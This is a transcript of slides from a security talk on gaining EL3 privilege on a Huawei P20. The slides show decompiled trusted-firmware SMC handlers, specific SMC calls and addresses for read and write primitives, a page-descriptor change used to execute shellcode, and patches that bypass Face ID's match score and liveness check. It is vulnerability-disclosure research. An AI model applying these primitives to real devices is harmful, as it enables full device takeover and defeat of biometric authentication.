EL3 Tour: Get the Ultimate Privilege of Android Phone

Transcript

1. EL3 Tour: Get The Ultimate Privilege of Android Phone Guanxing

   Wen 2019

2. Bio ✤ Senior Security Researcher at Pangu ✤ Exploitation and

   Reversing Engineering ✤ Recently ✤ Firmware, Bootloader, Kernel ✤ Previously ✤ Adobe Flash

3. Agenda ✤ ARMv8 Privilege mode ✤ Post-startup architecture of Huawei

   P20 ✤ Hunt EL3 Vulnerabilities ✤ Execute shellcode in EL3 ✤ Face ID Bypass

4. ARMv8 Privilege Mode Linux Kernel Hypervisor Trusted Firmware (No limits:

   Physical Memory, TTBR0_ELx, VBAR_ELx, …) Trusted Kernel Application Framework Libraries Services Trusted App EL0 EL1 EL2 EL3 Normal World Secure World

5. Huawei P20

6. Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970)

7. Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970) ✤ Android phone

   with great cameras

8. Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970) ✤ Android phone

   with great cameras ✤ Customized EL3 and S-EL0 & 1

9. Boot Chain fastboot.img

10. Boot Chain FASTBOOT

11. Boot Chain FASTBOOT trustfirmware.img teeos.img kernel.img

12. Boot Chain Trusted Firmware teeos.img kernel.img EL3

13. Boot Chain Trusted Firmware teeos.img kernel.img EL3

14. Boot Chain Trusted Firmware kernel.img EL3 Trusted Core Kernel S-EL1

    globaltask task_xxx S-EL0

15. Boot Chain Trusted Firmware Linux Kernel EL3 Trusted Core Kernel

    S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0

16. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World svc

17. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World smc

18. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World

19. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World IPC

20. Interact with Secure World Trusted Firmware EL3

21. ARM Trusted Firmware ✤ https://github.com/ARM-software/arm-trusted-firmware ✤ Switch between Secure and

    Normal World ✤ Physical Memory Partition ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch smc

22. Locate SMC Handler ✤ VBAR_EL3 ida-arm-system-highlight.py

23. ✤ VBAR_EL3

24. Dispatched to Trusted Core Trusted Firmware Trusted Core Secure Tasks

    eret eret

25. ARM Trusted Firmware (ATF) ✤ Switch between Secure and Normal

    World ✤ Physical Memory Partition ✤ Switch between Secure and Normal World ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch SMC ✤ Trusted Core handles most of smc calls, where EL3 handles the rest
26. None

27. Hunt EL3 Vulnerabilities

28. Running Environment of EL3 SCTLR_EL3

29. Running Environment of EL3 ✤ SCTLR_EL3.WXN = 1 ✤ No-ASLR

    ✤ No-CFI ✤ SCTLR_EL3.M = 1 ✤ TTBR0_EL3 ✤ Flat Mapping

30. Memory Layout of EL3 Start End Usage Permission 0x16800000 0x1CE00000

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 ??? R | W 0x5A000000 0xFFFDF000 MMIO R | W FASTBOOT

31. EL1 Kernel as a Start Point ✤ Root Exploit ✤

    Purchase an unlock code ✤ Unlock the Bootloader ✤ fastboot flash kernel kernel.img

32. ✤ Looking for smc usages EL1 Kernel as a Start

    Point #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... }

33. ✤ Search for SMC usages int atfd_hisi_rpmb_smc(u64 function_id, u64 arg0,

    u64 arg1, u64 arg2) { asm volatile( __asmeq("%0", "x0") __asmeq("%1", "x1") __asmeq("%2", "x2") __asmeq("%3", "x3") "smc #0\n" : "+r" (function_id) : "r" (arg0), "r" (arg1), "r" (arg2)); return (int)function_id; } EL1 Kernel as a Start Point

34. ✤ Looking for smc usages #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE

    0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... } EL1 Kernel as a Start Point
35. None
36. None

37. 0xC600FF04 Handler

38. 0xC600FF04 Handler

39. if (x0 == 0xC600FF04) { if ((rpmb_request_phy = x1) !=

    0x209E9000) { NOTICE(“sync kernel and bl31 for a same memory space failed\n”); goto err; } } 0xC600FF04 Handler

40. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }

41. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }

42. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); //Both PC and x0 are controlled !!! } }

43. 0xC600FF04 Handler History if (x0 == 0xC600FF04) { rpmb_request_phy =

    x1; } ~2018.3 Ancient

44. 0xC600FF04 Handler History if (x0 == 0xC600FF04) { if ((rpmb_request_phy

    = x1) != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient 2018.5

45. 0xC600FF04 Handler History if (x0 == 0xC600FF04) { if (x1

    != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient Contemporary

46. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient

47. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = rpmb_request_phy + 0x6000; //0x209E0000 is accessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient

48. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = callback_vtable; //inaccessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } Contemporary ~2018.7 Ancient

49. Control the PC and X0 ✤ Kernel module as smc

    wrapper ✤ insmod exploit.ko ✤ smc(0xC600FF04, func_pa) ✤ smc(0xC600FF06, param)

50. Control the PC and X0 ✤ Kernel module as smc

    wrapper ✤ insmod exploit.ko ✤ Tamper [0x209E9000 + 0x6C38] ✤ smc(0xC600FF06, param)

51. Execute Shellcode in EL3

52. x0 = controlled x1 = 0x209xxxxx x2 = 0x1FExxxxx SCTLR_EL3.WXN

    No ASLR No CFI 0xC600FF06 Handler

53. Write Primitive - Step 1 global_addr = controlled global_len =

    0x209xxxxx x0 = controlled x1 = 0x209xxxxx x2 = 0x1FExxxxx

54. Write Primitive - Step 2 global_addr = controlled, global_len =

    0x209xxxxx, x0 = controlled, x2 = 0x1FExxxxx

55. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,

56. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,

57. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,

58. Write Primitive - flawed global_addr = controlled, global_len = 0x209xxxxx,

    x0 = controlled, x2 = 0x1FExxxxx

59. Write Primitive - flawed global_addr = controlled, global_len = 0x209xxxxx,

    x0 = controlled, x2 = 0x1FExxxxx

60. R & W Primitives VTABLE ptr_function ptr_function ptr_function ptr_function

61. R & W Primitives VTABLE read gadget ptr_function Corrupted ptr_function

62. R & W Primitives xxx_handler(x0, x1, x2, x3) return ptr_func(x2,

    x3); Kernel Module smc eret

63. R & W Primitives

64. R & W Primitives

65. R & W Primitives ✤ Memory Read ✤ smc(0xC500AA01, addr

    - 0x18, 0, 0x55BBCCE0 + 1);

66. R & W Primitives ✤ Memory Read ✤ smc(0xC500AA01, addr

    - 0x18, 0, 0x55BBCCE0 + 1); ✤ Memory Write ✤ smc(0xC500AA01, addr - 8, value, 0x55BBCCE0 + 2);

67. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shared Memory R | W 0x5A000000 0xFFFDF000 MMIO R | W

68. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W

69. Page Table

70. Page Descriptor 0x209F8627

71. Page Descriptor 0x209F8 627 000

72. Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

73. Page Descriptor

74. Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

75. Page Descriptor 627 0|1|1 0|1 0|0|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]

76. Invalidate TLB

77. Invalidate TLB

78. Execute Shellcode ✤ Deploy Shellcode at 0x209F8000 ✤ Page Descriptior

    Modification: 0x209F8627 => 0x209F8783 ✤ TLBI ALLEL3 ✤ Invoke 0x209F8000

79. We are in EL3 ✤ Do whatever you want ✤

    Check all those encrypted modules ✤ Modify and debug every peripheral ✤ Nothing is hidden from you anymore

80. Face ID Bypass

81. Become a Faceless Man

82. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W

83. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper /odm/ta/xxx.sec Normal World Secure World

84. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper /odm/ta/xxx.sec Normal World Secure World

85. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper task_xxx Normal World Secure World

86. Secure Task of Face ID ✤ Dynamic Loaded Trusted Application

    ✤ /odm/ta/e8014913-e501-4d44-a9d6-058ec3b93b90.sec ✤ TEE_SERVICE_FACE_REC ✤ Search and extract it from physical memory

87. Detection Logic of Face ID ✤ Calculate scores as results

    of image comparison ✤ secure task covers the entire logic ✤ Liveness detection ✤ Multiple methods (Both secure task and NS-EL0 are involved)

88. Patch Matching Score

89. Patch Matching Score svsprintf log messages to /dev/hisi_teelog

90. Patch Liveness Result

91. Patch Liveness Result

92. None

93. Thank you @hhj4ck